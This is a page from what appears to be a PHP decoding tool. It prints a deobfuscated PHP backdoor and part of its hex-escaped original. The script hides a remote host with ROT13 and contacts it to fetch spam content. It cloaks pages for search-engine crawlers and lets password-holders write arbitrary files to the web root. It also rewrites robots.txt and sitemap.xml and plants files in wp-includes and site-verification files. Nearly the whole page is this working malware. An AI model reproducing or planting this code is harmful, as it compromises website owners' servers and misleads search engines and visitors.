Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto a38Cy; xnraC: @header("\x48\124\x54\120\x2f\61\x2e\x31\x20\x34\60\x34\x20\..

Decoded Output download

<?php 
 
goto a38Cy; 
xnraC: 
@header("HTTP/1.1 404 Not Found"); 
goto F5myT; 
sv91p: 
$nHle3 = "http"; 
goto sUgFj; 
IYRQe: 
$pw0B_ = str_replace("[##linkcss##]", '', $pw0B_); 
goto mbGgF; 
t4InS: 
$hzwAe = "wp-includes/css"; 
goto tYJj3; 
D9lOH: 
$hhK6x = urlencode($dlJF9); 
goto xKo2B; 
pggRJ: 
if (strstr($pw0B_, "pingxmlgetcontent")) { 
  goto n6F_N; 
} 
goto V3w6w; 
K_hU6: 
$EE0WS = "User-agent: *
Allow: /"; 
goto r_rwU; 
xGv1w: 
bnTZ2: 
goto GxybF; 
zoh3C: 
echo $pw0B_; 
goto fOu7N; 
cDqVe: 
ArZXr: 
goto ZckHC; 
Eqtik: 
bjKZ5: 
goto UovW2; 
TZmNx: 
goto nbJPU; 
goto hicnW; 
oECxM: 
if ($dx2nO) { 
  goto HQlys; 
} 
goto ylQvK; 
DTjda: 
$dx2nO = @$_REQUEST["action"]; 
goto Qi5dy; 
Jv8Bc: 
y4dyA: 
goto hma0V; 
ylQvK: 
$dx2nO = "put"; 
goto L17p0; 
qAt2f: 
$m2k0k = @$_REQUEST["dstr"]; 
goto uAV8Z; 
k4I2V: 
$ADZWd = str_rot13(urldecode($MdQVO)); 
goto nPDCH; 
AJaL0: 
exit; 
goto H4n1S; 
A1ruT: 
$ysNSk = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; 
goto C4WF4; 
hicnW: 
qdiac: 
goto xnraC; 
aHEso: 
goto bjKZ5; 
goto IvNE8; 
bA2kE: 
jtGwQ: 
goto NJs9g; 
k82qD: 
if (strstr($pw0B_, "nobotuseragent")) { 
  goto A0W_N; 
} 
goto qBJJ0; 
WcaMd: 
if (strstr($pw0B_, "getcontent404page")) { 
  goto qdiac; 
} 
goto pW0Rr; 
vQGF1: 
$t506A = $RHF2e . "/" . $hzwAe . "/" . $OmnPj; 
goto If3kx; 
Tk7qR: 
$LLUXB = $Vr7dY . "://" . $ADZWd . "/indexnew.php?web=" . $eoLmA . "&zz=" . SHeI9() . "&uri=" . $hhK6x . "&urlshang=" . $sZB9t . "&http=" . $nHle3 . "&lang=" . $ysNSk . "&css=1"; 
goto lGMzL; 
d5sfX: 
goto XqZCm; 
goto cr868; 
t5Z24: 
f_OWR: 
goto Kdzn6; 
lGMzL: 
PvDvy: 
goto s8O1C; 
d1N4r: 
MfSA0: 
goto GGiyl; 
m5id9: 
if (!($E74FR == "f75fd5acd36a7fbd1e219b19881a5348bfc66e79")) { 
  goto Gb1Oa; 
} 
goto Vkqwo; 
Kdzn6: 
if (is_dir($RHF2e . "/wp-includes")) { 
  goto RURK3; 
} 
goto dCwhk; 
tYJj3: 
AYbRT: 
goto gTuKc; 
ORnJO: 
goto PvDvy; 
goto u_pos; 
cfzXi: 
function U3XsS($tshPi, $t506A, $liNWD) 
{ 
  goto R0INy; 
  ht8zI: 
  if (!@mkdir($tshPi)) { 
    goto ZOz4Y; 
  } 
  goto leqar; 
  GqRJG: 
  @file_put_contents($t506A, IDfz2($liNWD)); 
  goto Iw88r; 
  jG795: 
  WweCV: 
  goto NL3pu; 
  A449A: 
  JMA8K: 
  goto EfrbH; 
  azExN: 
  rqlMi: 
  goto A449A; 
  leqar: 
  if (file_exists($t506A)) { 
    goto koV0l; 
  } 
  goto GqRJG; 
  R0INy: 
  if (is_dir($tshPi)) { 
    goto WweCV; 
  } 
  goto ht8zI; 
  Iw88r: 
  koV0l: 
  goto yB_iO; 
  yB_iO: 
  ZOz4Y: 
  goto B9yAl; 
  LV0LT: 
  @file_put_contents($t506A, IDFz2($liNWD)); 
  goto azExN; 
  B9yAl: 
  goto JMA8K; 
  goto jG795; 
  NL3pu: 
  if (file_exists($t506A)) { 
    goto rqlMi; 
  } 
  goto LV0LT; 
  EfrbH: 
} 
goto hKZK5; 
Olfq4: 
Dsdvq: 
goto D9lOH; 
DnsO5: 
XaPn2: 
goto Dh59K; 
OG1RJ: 
xz943: 
goto a_tJs; 
Qi5dy: 
if (isset($_SERVER["DOCUMENT_ROOT"])) { 
  goto kvmBz; 
} 
goto kzBVG; 
zaKTp: 
WqoWM: 
goto miPDW; 
gTuKc: 
$tshPi = $RHF2e . "/" . $hzwAe; 
goto Vd9vR; 
ZckHC: 
echo "<br>sitemap already added!<br>"; 
goto kJ7w9; 
Y2OBK: 
eIrwF: 
goto upEpR; 
CAxAd: 
@header("Content-type: text/html; charset=utf-8"); 
goto L2k5m; 
zON_u: 
if (strstr($doQd_, ".xml")) { 
  goto dcjhy; 
} 
goto PrQzr; 
NJs9g: 
$dlJF9 = PPTF0(); 
goto G0gtC; 
hma0V: 
$fNA1_ = $RHF2e . "/robots.txt"; 
goto Pbx8o; 
pfJQi: 
$mLSUc = $_REQUEST["google"]; 
goto yRmy7; 
Ghu9y: 
file_put_contents($mLSUc, "google-site-verification:" . " " . $mLSUc); 
goto x2t3P; 
pP4te: 
goto Ty3kS; 
goto xqq_g; 
xqq_g: 
n6F_N: 
goto jwBp3; 
pzPhK: 
YfbrP: 
goto cjbcQ; 
EDQtl: 
@ignore_user_abort(1); 
goto ZiP4H; 
GxhpJ: 
$eoLmA = $_SERVER["HTTP_HOST"]; 
goto A1ruT; 
yZTzg: 
function SHeI9() 
{ 
  goto Cjc7a; 
  Cjc7a: 
  $kCJvv = strtolower($_SERVER["HTTP_USER_AGENT"]); 
  goto GWj7i; 
  V1r8Q: 
  return false; 
  goto WOVhB; 
  GWj7i: 
  if (stristr($kCJvv, "googlebot") || stristr($kCJvv, "bing") || stristr($kCJvv, "yahoo") || stristr($kCJvv, "google") || stristr($kCJvv, "Googlebot") || stristr($kCJvv, "googlebot")) { 
    goto On9Dd; 
  } 
  goto V1r8Q; 
  WOVhB: 
  goto KQb36; 
  goto Lis6P; 
  AULny: 
  KQb36: 
  goto f3We3; 
  U4TO8: 
  return true; 
  goto AULny; 
  Lis6P: 
  On9Dd: 
  goto U4TO8; 
  f3We3: 
} 
goto dsa4O; 
MmSA5: 
if (!($iUCfH == idfZ2($Vr7dY . "://" . $ADZWd . "/a.p" . "hp") || $h57Dr == "f8f0dae804368c0334e22d9dcb70d3c7bbfa9635")) { 
  goto ehYmL; 
} 
goto qAt2f; 
IuXFH: 
echo "ok"; 
goto OG1RJ; 
u1uGD: 
Je0_F: 
goto BcLkM; 
GqI7N: 
if (!is_file($NU6nP)) { 
  goto y4dyA; 
} 
goto HR7F3; 
I_ZJa: 
if (strstr($pw0B_, "okxmlgetcontent")) { 
  goto HOvfu; 
} 
goto pggRJ; 
mbGgF: 
goto T3Qnj; 
goto Y2OBK; 
Wf7vv: 
if (!isset($_SERVER["HTTP_REFERER"])) { 
  goto YfbrP; 
} 
goto bg7af; 
a38Cy: 
@set_time_limit(3600); 
goto EDQtl; 
GGiyl: 
$iUCfH = sha1(sha1(@$_REQUEST["a"])); 
goto mRiff; 
pW0Rr: 
if (!strstr($pw0B_, "getcontent301page")) { 
  goto v7LIU; 
} 
goto N3eYU; 
GxybF: 
if (is_file($t506A)) { 
  goto V_P2C; 
} 
goto oAjP_; 
gLfK3: 
mLhVq: 
goto zON_u; 
t9IJa: 
goto f_OWR; 
goto U8mlE; 
AoM7q: 
$RHF2e = dirname(__FILE__); 
goto t9IJa; 
uAV8Z: 
if (!file_put_contents($RHF2e . "/" . $doQd_, $m2k0k)) { 
  goto xz943; 
} 
goto IuXFH; 
pswuA: 
if (!($dx2nO == "put")) { 
  goto UGjC2; 
} 
goto xhgcX; 
BdK6J: 
$dvNsH = substr($eoLmA, 4); 
goto zaKTp; 
J2Wdf: 
$EE0WS = iDFZ2($fNA1_); 
goto lEACH; 
inele: 
U3Xss($tshPi, $t506A, $liNWD); 
goto xGv1w; 
yxenm: 
Gb1Oa: 
goto Mjt9o; 
DjiRB: 
exit; 
goto yxenm; 
cjbcQ: 
$E74FR = sha1(sha1(@$_REQUEST["pd"])); 
goto m5id9; 
upEpR: 
$OLm6n = file_get_contents($t506A); 
goto QgQoC; 
vEKjr: 
goto AYbRT; 
goto BZyjC; 
afUX0: 
w9VWX: 
goto Hj9Jf; 
qBJJ0: 
if (strstr($pw0B_, "okhtmlgetcontent")) { 
  goto JbDNl; 
} 
goto I_ZJa; 
C4WF4: 
$ysNSk = urlencode($ysNSk); 
goto KR9Kt; 
LJeN2: 
$Vr7dY = "http"; 
goto iJNHf; 
a_tJs: 
ehYmL: 
goto WJcpf; 
DkF6W: 
exit; 
goto U7Hij; 
W61Oa: 
goto WqoWM; 
goto oZaKC; 
gDxXt: 
zQV7m: 
goto d1N4r; 
Hj9Jf: 
$nHle3 = "https"; 
goto bA2kE; 
cCbdZ: 
NQtyB: 
goto tg83k; 
CsEw7: 
kvmBz: 
goto a1bFu; 
GRsSl: 
dcjhy: 
goto pyozO; 
oAjP_: 
$LLUXB = $Vr7dY . "://" . $ADZWd . "/indexnew.php?web=" . $eoLmA . "&zz=" . SheI9() . "&uri=" . $hhK6x . "&urlshang=" . $sZB9t . "&http=" . $nHle3 . "&lang=" . $ysNSk; 
goto ORnJO; 
I27ZC: 
$dlJF9 = "/"; 
goto Olfq4; 
dCwhk: 
$hzwAe = "css"; 
goto vEKjr; 
V3w6w: 
if (strstr($pw0B_, "getcontent500page")) { 
  goto KoNNw; 
} 
goto WcaMd; 
jwBp3: 
$pw0B_ = str_replace("pingxmlgetcontent", '', $pw0B_); 
goto W3bSP; 
A4WSb: 
goto cSBRU; 
goto qP93p; 
jTPgk: 
@header("Content-type: text/html; charset=utf-8"); 
goto l84Og; 
GAdVK: 
exit; 
goto u1uGD; 
kJ7w9: 
rADb1: 
goto Np_LL; 
l84Og: 
echo FQROm($pw0B_); 
goto DkF6W; 
WJcpf: 
UGjC2: 
goto DjiRB; 
K16cM: 
JbDNl: 
goto CAxAd; 
NfYbJ: 
UFIeg: 
goto oECxM; 
McnnE: 
T3Qnj: 
goto mQ2HE; 
FNAox: 
$pw0B_ = str_replace("okxmlgetcontent", '', $pw0B_); 
goto cDcfr; 
lEACH: 
y12Mm: 
goto M5c7V; 
Ylxth: 
exit; 
goto NmMG6; 
jBvkR: 
function fqroM($XiNLm) 
{ 
  goto Y3ip1; 
  Y3ip1: 
  $gNBt7 = explode("
\xa", trim($XiNLm)); 
  goto tSxWI; 
  klsNx: 
  foreach ($gNBt7 as $AkGxu) { 
    goto z2srz; 
    R9C2h: 
    $zrsVm = strpos($cfS4h, "Sitemap Notification Received") !== false ? "pingok" : "error"; 
    goto YG7SA; 
    YG7SA: 
    $wG6VW .= $AkGxu . "-- " . $zrsVm . "<br>"; 
    goto T0ioY; 
    z2srz: 
    $cfS4h = IDfZ2($AkGxu); 
    goto R9C2h; 
    T0ioY: 
    FowMk: 
    goto Ym9C2; 
    Ym9C2: 
  } 
  goto doQnD; 
  EwaRe: 
  return $wG6VW; 
  goto C4w5a; 
  doQnD: 
  jfZZj: 
  goto EwaRe; 
  tSxWI: 
  $wG6VW = ''; 
  goto klsNx; 
  C4w5a: 
} 
goto yZTzg; 
cDcfr: 
@header("Content-type: text/xml"); 
goto zoh3C; 
HR7F3: 
@unlink($NU6nP); 
goto Jv8Bc; 
IUbJy: 
goto UFIeg; 
goto CsEw7; 
a1bFu: 
$RHF2e = $_SERVER["DOCUMENT_ROOT"]; 
goto NfYbJ; 
ZL0SS: 
@header("HTTP/1.1 500 Internal Server Error"); 
goto Ylxth; 
pyozO: 
$NU6nP = $RHF2e . "/sitemap.xml"; 
goto GqI7N; 
L17p0: 
HQlys: 
goto pswuA; 
r_rwU: 
goto y12Mm; 
goto yxZ1M; 
ybI1y: 
header("Location: " . $pw0B_); 
goto AJaL0; 
Vkqwo: 
$doQd_ = @$_REQUEST["mapname"]; 
goto DTjda; 
Dh59K: 
echo "<br>ok<br>"; 
goto cQdrd; 
bg7af: 
$sZB9t = $_SERVER["HTTP_REFERER"]; 
goto Aiao7; 
UovW2: 
goto Je0_F; 
goto K16cM; 
xKo2B: 
function ppTf0() 
{ 
  goto IWasp; 
  LX3hc: 
  svlZP: 
  goto pCaH2; 
  HaJHx: 
  FP4PC: 
  goto gCxYT; 
  gCxYT: 
  $hhK6x = $_SERVER["REQUEST_URI"]; 
  goto LX3hc; 
  pCaH2: 
  return $hhK6x; 
  goto IT5xE; 
  G_7mm: 
  goto svlZP; 
  goto HaJHx; 
  GpVAB: 
  tBfHD: 
  goto G_7mm; 
  qhmHF: 
  $hhK6x = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; 
  goto bp1WE; 
  Kw51w: 
  $hhK6x = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; 
  goto GpVAB; 
  V9x9B: 
  DIXhA: 
  goto Kw51w; 
  bp1WE: 
  goto tBfHD; 
  goto V9x9B; 
  IWasp: 
  if (isset($_SERVER["REQUEST_URI"])) { 
    goto FP4PC; 
  } 
  goto oHXe6; 
  oHXe6: 
  if (isset($_SERVER["argv"])) { 
    goto DIXhA; 
  } 
  goto qhmHF; 
  IT5xE: 
} 
goto k4I2V; 
L2k5m: 
if (file_exists($t506A)) { 
  goto eIrwF; 
} 
goto IYRQe; 
Np_LL: 
goto zQV7m; 
goto cCbdZ; 
AROSu: 
$RHF2e = $_SERVER["DOCUMENT_ROOT"]; 
goto t5Z24; 
Mjt9o: 
if (isset($_SERVER["DOCUMENT_ROOT"])) { 
  goto djX3m; 
} 
goto AoM7q; 
yIdfh: 
if (file_exists($fNA1_)) { 
  goto XGVN3; 
} 
goto K_hU6; 
mRiff: 
$h57Dr = sha1(sha1(@$_REQUEST["b"])); 
goto MmSA5; 
x2t3P: 
exit("<a href=" . $mLSUc . ">" . $mLSUc . "</a>"); 
goto wsydS; 
iJNHf: 
if (Oz7GQ()) { 
  goto w9VWX; 
} 
goto sv91p; 
wsydS: 
hudbc: 
goto gLfK3; 
qP93p: 
wVp_k: 
goto egKSG; 
Aiao7: 
$sZB9t = urlencode($sZB9t); 
goto pzPhK; 
ZzuO1: 
echo "<br>file write false!<br>"; 
goto A4WSb; 
R2Zle: 
$dvNsH = $eoLmA; 
goto W61Oa; 
yxZ1M: 
XGVN3: 
goto J2Wdf; 
F5myT: 
exit; 
goto xbWzu; 
dsa4O: 
function IdFZ2($XiNLm) 
{ 
  goto tSmVg; 
  yFLzO: 
  $xE1Qm = curl_exec($fQNCI); 
  goto CHPxf; 
  A5hU8: 
  return $xE1Qm; 
  goto oZsX_; 
  FIZZG: 
  curl_setopt($fQNCI, CURLOPT_SSL_VERIFYPEER, 0); 
  goto D99Zj; 
  BTFDZ: 
  curl_setopt($fQNCI, CURLOPT_URL, $XiNLm); 
  goto AdsuW; 
  r7pJN: 
  if ($xE1Qm) { 
    goto sQlni; 
  } 
  goto NspkF; 
  CHPxf: 
  curl_close($fQNCI); 
  goto LVfv_; 
  LVfv_: 
  Xd1aM: 
  goto r7pJN; 
  Pbc6Y: 
  sQlni: 
  goto A5hU8; 
  D99Zj: 
  curl_setopt($fQNCI, CURLOPT_RETURNTRANSFER, 1); 
  goto knkFy; 
  NspkF: 
  $xE1Qm = @file_get_contents($XiNLm); 
  goto Pbc6Y; 
  tSmVg: 
  $xE1Qm = ''; 
  goto cETBN; 
  cETBN: 
  if (!function_exists("curl_init")) { 
    goto Xd1aM; 
  } 
  goto tXoZb; 
  tXoZb: 
  $fQNCI = curl_init(); 
  goto BTFDZ; 
  AdsuW: 
  curl_setopt($fQNCI, CURLOPT_SSL_VERIFYHOST, 0); 
  goto FIZZG; 
  knkFy: 
  curl_setopt($fQNCI, CURLOPT_CONNECTTIMEOUT, 30); 
  goto yFLzO; 
  oZsX_: 
} 
goto cfzXi; 
ZiP4H: 
$MdQVO = "%6E%65%70%75%76%70%78%6B%79%2E%66%63%75%6E%66%67%6C%71%61%2E%6B%6C%6D"; 
goto LJeN2; 
oZaKC: 
bwvje: 
goto BdK6J; 
ECy8h: 
if (stristr($EE0WS, $I4E_s)) { 
  goto ArZXr; 
} 
goto Seppt; 
miPDW: 
$OmnPj = str_rot13(substr($dvNsH, 0, 3) . substr($ADZWd, 0, 3)) . ".css"; 
goto vQGF1; 
cr868: 
KoNNw: 
goto ZL0SS; 
u_pos: 
V_P2C: 
goto Tk7qR; 
l5eI6: 
$pw0B_ = str_replace("getcontent301page", '', $pw0B_); 
goto ybI1y; 
N3eYU: 
@header("HTTP/1.1 301 Moved Permanently"); 
goto l5eI6; 
yRmy7: 
if (!preg_match("/^google.*?(\.html)$/i", $mLSUc)) { 
  goto hudbc; 
} 
goto Ghu9y; 
KR9Kt: 
$sZB9t = ''; 
goto Wf7vv; 
QgQoC: 
$pw0B_ = str_replace("[##linkcss##]", $OLm6n, $pw0B_); 
goto McnnE; 
zlldn: 
goto rADb1; 
goto cDqVe; 
U8mlE: 
djX3m: 
goto AROSu; 
If3kx: 
$liNWD = $Vr7dY . "://" . $ADZWd . "/temp/style.css"; 
goto jBvkR; 
hKZK5: 
if (!($dlJF9 == "/" || strstr($dlJF9, "ewttm"))) { 
  goto bnTZ2; 
} 
goto inele; 
W3bSP: 
U3Xss($tshPi, $t506A, $liNWD); 
goto jTPgk; 
i0uGM: 
goto MfSA0; 
goto GRsSl; 
n3mQo: 
goto GRRKQ; 
goto DnsO5; 
kzBVG: 
$RHF2e = dirname(__FILE__); 
goto IUbJy; 
NmMG6: 
XqZCm: 
goto pP4te; 
xhgcX: 
if (!isset($_REQUEST["google"])) { 
  goto mLhVq; 
} 
goto pfJQi; 
BZyjC: 
RURK3: 
goto t4InS; 
nPDCH: 
function oz7gQ() 
{ 
  goto zOVYF; 
  KYHgj: 
  return true; 
  goto hehQj; 
  uujBb: 
  L_itu: 
  goto qco7f; 
  qco7f: 
  return true; 
  goto WD5zq; 
  WD5zq: 
  QcQ7Q: 
  goto Kg6J4; 
  zOVYF: 
  if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { 
    goto xiTx1; 
  } 
  goto cgiyR; 
  cgiyR: 
  if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { 
    goto zpvtn; 
  } 
  goto ISrcZ; 
  ISrcZ: 
  if (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { 
    goto L_itu; 
  } 
  goto D9SvC; 
  D9SvC: 
  goto QcQ7Q; 
  goto SEiXn; 
  hehQj: 
  goto QcQ7Q; 
  goto Xldzv; 
  SEiXn: 
  xiTx1: 
  goto KYHgj; 
  Xldzv: 
  zpvtn: 
  goto oSa1y; 
  FRzXJ: 
  goto QcQ7Q; 
  goto uujBb; 
  Kg6J4: 
  return false; 
  goto cup6U; 
  oSa1y: 
  return true; 
  goto FRzXJ; 
  cup6U: 
} 
goto GxhpJ; 
sUgFj: 
goto jtGwQ; 
goto afUX0; 
Seppt: 
if (file_put_contents($fNA1_, trim($EE0WS) . "\xd
" . "Sitemap: " . $I4E_s)) { 
  goto wVp_k; 
} 
goto ZzuO1; 
xbWzu: 
nbJPU: 
goto d5sfX; 
s8O1C: 
$pw0B_ = trim(iDfZ2($LLUXB)); 
goto k82qD; 
IvNE8: 
HOvfu: 
goto FNAox; 
U7Hij: 
Ty3kS: 
goto aHEso; 
Pbx8o: 
if (stristr($doQd_, "User-agent")) { 
  goto NQtyB; 
} 
goto yIdfh; 
fOu7N: 
exit; 
goto Eqtik; 
IA0bn: 
cSBRU: 
goto zlldn; 
BycPi: 
echo "<br>file write false!<br>"; 
goto n3mQo; 
H4n1S: 
v7LIU: 
goto TZmNx; 
PrQzr: 
echo "<br>sitemap name false!<br>"; 
goto i0uGM; 
hgOiz: 
echo $pw0B_; 
goto GAdVK; 
tg83k: 
@unlink($fNA1_); 
goto xckp1; 
mQ2HE: 
$pw0B_ = str_replace("okhtmlgetcontent", '', $pw0B_); 
goto hgOiz; 
cQdrd: 
GRRKQ: 
goto gDxXt; 
G0gtC: 
if (!($dlJF9 == '')) { 
  goto Dsdvq; 
} 
goto I27ZC; 
egKSG: 
echo "<br>ok<br>"; 
goto IA0bn; 
xckp1: 
if (file_put_contents($fNA1_, $doQd_)) { 
  goto XaPn2; 
} 
goto BycPi; 
Vd9vR: 
if (substr($eoLmA, 0, 4) == "www.") { 
  goto bwvje; 
} 
goto R2Zle; 
M5c7V: 
$I4E_s = $nHle3 . "://" . $eoLmA . "/" . $doQd_; 
goto ECy8h; 
BcLkM: 
A0W_N: 
 ?>

Did this file decode correctly?

Original Code

<?php

goto a38Cy;
xnraC:
@header("\x48\124\x54\120\x2f\61\x2e\x31\x20\x34\60\x34\x20\x4e\x6f\x74\40\106\x6f\x75\x6e\144");
goto F5myT;
sv91p:
$nHle3 = "\x68\164\164\x70";
goto sUgFj;
IYRQe:
$pw0B_ = str_replace("\x5b\43\43\x6c\x69\156\153\x63\x73\x73\43\x23\x5d", '', $pw0B_);
goto mbGgF;
t4InS:
$hzwAe = "\x77\x70\55\151\156\143\154\x75\x64\x65\163\x2f\143\163\163";
goto tYJj3;
D9lOH:
$hhK6x = urlencode($dlJF9);
goto xKo2B;
pggRJ:
if (strstr($pw0B_, "\160\151\156\147\x78\x6d\154\x67\x65\x74\x63\157\x6e\x74\145\156\164")) {
  goto n6F_N;
}
goto V3w6w;
K_hU6:
$EE0WS = "\125\x73\x65\x72\55\x61\147\145\x6e\164\72\40\52\15\12\101\154\154\157\167\72\x20\x2f";
goto r_rwU;
xGv1w:
bnTZ2:
goto GxybF;
zoh3C:
echo $pw0B_;
goto fOu7N;
cDqVe:
ArZXr:
goto ZckHC;
Eqtik:
bjKZ5:
goto UovW2;
TZmNx:
goto nbJPU;
goto hicnW;
oECxM:
if ($dx2nO) {
  goto HQlys;
}
goto ylQvK;
DTjda:
$dx2nO = @$_REQUEST["\141\143\x74\x69\x6f\x6e"];
goto Qi5dy;
Jv8Bc:
y4dyA:
goto hma0V;
ylQvK:
$dx2nO = "\x70\x75\164";
goto L17p0;
qAt2f:
$m2k0k = @$_REQUEST["\x64\x73\x74\x72"];
goto uAV8Z;
k4I2V:
$ADZWd = str_rot13(urldecode($MdQVO));
goto nPDCH;
AJaL0:
exit;
goto H4n1S;
A1ruT:
$ysNSk = @$_SERVER["\x48\x54\124\120\x5f\101\103\x43\105\120\x54\x5f\114\101\116\107\x55\x41\x47\x45"];
goto C4WF4;
hicnW:
qdiac:
goto xnraC;
aHEso:
goto bjKZ5;
goto IvNE8;
bA2kE:
jtGwQ:
goto NJs9g;
k82qD:
if (strstr($pw0B_, "\x6e\157\142\x6f\x74\x75\163\145\x72\141\147\145\156\164")) {
  goto A0W_N;
}
goto qBJJ0;
WcaMd:
if (strstr($pw0B_, "\x67\145\164\x63\x6f\156\164\145\x6e\164\64\60\64\x70\x61\147\145")) {
  goto qdiac;
}
goto pW0Rr;
vQGF1:
$t506A = $RHF2e . "\57" . $hzwAe . "\x2f" . $OmnPj;
goto If3kx;
Tk7qR:
$LLUXB = $Vr7dY . "\72\x2f\x2f" . $ADZWd . "\x2f\x69\156\x64\145\x78\x6e\x65\167\56\160\150\160\77\167\x65\142\x3d" . $eoLmA . "\46\172\172\x3d" . SHeI9() . "\x26\x75\x72\x69\x3d" . $hhK6x . "\46\165\162\154\x73\x68\x61\x6e\x67\75" . $sZB9t . "\x26\150\164\x74\160\x3d" . $nHle3 . "\46\x6c\141\156\147\x3d" . $ysNSk . "\46\x63\x73\x73\75\x31";
goto lGMzL;
d5sfX:
goto XqZCm;
goto cr868;
t5Z24:
f_OWR:
goto Kdzn6;
lGMzL:
PvDvy:
goto s8O1C;
d1N4r:
MfSA0:
goto GGiyl;
m5id9:
if (!($E74FR == "\146\x37\x35\146\144\65\x61\x63\x64\63\66\x61\67\x66\x62\x64\x31\145\62\x31\71\x62\x31\71\x38\x38\x31\x61\x35\63\64\70\142\146\143\x36\66\145\x37\71")) {
  goto Gb1Oa;
}
goto Vkqwo;
Kdzn6:
if (is_dir($RHF2e . "\x2f\167\160\55\151\x6e\x63\x6c\165\x64\145\x73")) {
  goto RURK3;
}
goto dCwhk;
tYJj3:
AYbRT:
goto gTuKc;
ORnJO:
goto PvDvy;
goto u_pos;
cfzXi:
function U3XsS($tshPi, $t506A, $liNWD)
{
  goto R0INy;
  ht8zI:
  if (!@mkdir($tshPi)) {
    goto ZOz4Y;
  }
  goto leqar;
  GqRJG:
  @file_put_contents($t506A, IDfz2($liNWD));
  goto Iw88r;
  jG795:
  WweCV:
  goto NL3pu;
  A449A:
  JMA8K:
  goto EfrbH;
  azExN:
  rqlMi:
  goto A449A;
  leqar:
  if (file_exists($t506A)) {
    goto koV0l;
  }
  goto GqRJG;
  R0INy:
  if (is_dir($tshPi)) {
    goto WweCV;
  }
  goto ht8zI;
  Iw88r:
  koV0l:
  goto yB_iO;
  yB_iO:
  ZOz4Y:
  goto B9yAl;
  LV0LT:
  @file_put_contents($t506A, IDFz2($liNWD));
  goto azExN;
  B9yAl:
  goto JMA8K;
  goto jG795;
  NL3pu:
  if (file_exists($t506A)) {
    goto rqlMi;
  }
  goto LV0LT;
  EfrbH:
}
goto hKZK5;
Olfq4:
Dsdvq:
goto D9lOH;
DnsO5:
XaPn2:
goto Dh59K;
OG1RJ:
xz943:
goto a_tJs;
Qi5dy:
if (isset($_SERVER["\x44\117\x43\x55\x4d\x45\116\124\x5f\122\117\117\124"])) {
  goto kvmBz;
}
goto kzBVG;
zaKTp:
WqoWM:
goto miPDW;
gTuKc:
$tshPi = $RHF2e . "\x2f" . $hzwAe;
goto Vd9vR;
ZckHC:
echo "\x3c\x62\162\x3e\x73\151\x74\145\155\141\x70\x20\141\154\x72\145\x61\x64\171\x20\141\144\x64\x65\x64\x21\74\x62\x72\76";
goto kJ7w9;
Y2OBK:
eIrwF:
goto upEpR;
CAxAd:
@header("\103\157\x6e\x74\145\156\164\55\164\171\160\145\x3a\40\x74\145\x78\x74\57\150\x74\155\x6c\73\40\x63\150\x61\162\x73\x65\164\75\165\164\146\x2d\70");
goto L2k5m;
zON_u:
if (strstr($doQd_, "\x2e\170\155\x6c")) {
  goto dcjhy;
}
goto PrQzr;
NJs9g:
$dlJF9 = PPTF0();
goto G0gtC;
hma0V:
$fNA1_ = $RHF2e . "\57\162\x6f\142\157\164\163\x2e\x74\170\164";
goto Pbx8o;
pfJQi:
$mLSUc = $_REQUEST["\x67\x6f\x6f\147\154\145"];
goto yRmy7;
Ghu9y:
file_put_contents($mLSUc, "\147\157\x6f\x67\x6c\145\x2d\163\151\x74\x65\x2d\x76\x65\x72\x69\146\x69\x63\141\x74\x69\157\156\x3a" . "\40" . $mLSUc);
goto x2t3P;
pP4te:
goto Ty3kS;
goto xqq_g;
xqq_g:
n6F_N:
goto jwBp3;
pzPhK:
YfbrP:
goto cjbcQ;
EDQtl:
@ignore_user_abort(1);
goto ZiP4H;
GxhpJ:
$eoLmA = $_SERVER["\x48\x54\x54\120\137\110\x4f\x53\124"];
goto A1ruT;
yZTzg:
function SHeI9()
{
  goto Cjc7a;
  Cjc7a:
  $kCJvv = strtolower($_SERVER["\x48\124\124\x50\137\x55\123\x45\122\x5f\101\x47\105\116\x54"]);
  goto GWj7i;
  V1r8Q:
  return false;
  goto WOVhB;
  GWj7i:
  if (stristr($kCJvv, "\147\x6f\x6f\147\x6c\145\142\157\164") || stristr($kCJvv, "\x62\x69\x6e\x67") || stristr($kCJvv, "\171\x61\x68\157\x6f") || stristr($kCJvv, "\x67\x6f\x6f\x67\x6c\x65") || stristr($kCJvv, "\107\x6f\157\147\154\x65\142\157\x74") || stristr($kCJvv, "\147\x6f\157\x67\x6c\x65\x62\x6f\164")) {
    goto On9Dd;
  }
  goto V1r8Q;
  WOVhB:
  goto KQb36;
  goto Lis6P;
  AULny:
  KQb36:
  goto f3We3;
  U4TO8:
  return true;
  goto AULny;
  Lis6P:
  On9Dd:
  goto U4TO8;
  f3We3:
}
goto dsa4O;
MmSA5:
if (!($iUCfH == idfZ2($Vr7dY . "\72\57\57" . $ADZWd . "\57\x61\56\x70" . "\150\x70") || $h57Dr == "\146\70\146\x30\x64\141\x65\70\x30\x34\x33\66\70\143\60\63\x33\64\145\62\62\144\x39\x64\x63\x62\x37\x30\x64\x33\x63\x37\x62\x62\146\141\x39\x36\x33\x35")) {
  goto ehYmL;
}
goto qAt2f;
IuXFH:
echo "\157\153";
goto OG1RJ;
u1uGD:
Je0_F:
goto BcLkM;
GqI7N:
if (!is_file($NU6nP)) {
  goto y4dyA;
}
goto HR7F3;
I_ZJa:
if (strstr($pw0B_, "\x6f\153\x78\x6d\154\147\145\164\143\x6f\x6e\164\145\156\x74")) {
  goto HOvfu;
}
goto pggRJ;
mbGgF:
goto T3Qnj;
goto Y2OBK;
Wf7vv:
if (!isset($_SERVER["\110\124\x54\x50\x5f\x52\105\x46\105\x52\105\122"])) {
  goto YfbrP;
}
goto bg7af;
a38Cy:
@set_time_limit(3600);
goto EDQtl;
GGiyl:
$iUCfH = sha1(sha1(@$_REQUEST["\x61"]));
goto mRiff;
pW0Rr:
if (!strstr($pw0B_, "\x67\x65\164\143\x6f\x6e\164\x65\156\164\x33\60\x31\x70\x61\x67\x65")) {
  goto v7LIU;
}
goto N3eYU;
GxybF:
if (is_file($t506A)) {
  goto V_P2C;
}
goto oAjP_;
gLfK3:
mLhVq:
goto zON_u;
t9IJa:
goto f_OWR;
goto U8mlE;
AoM7q:
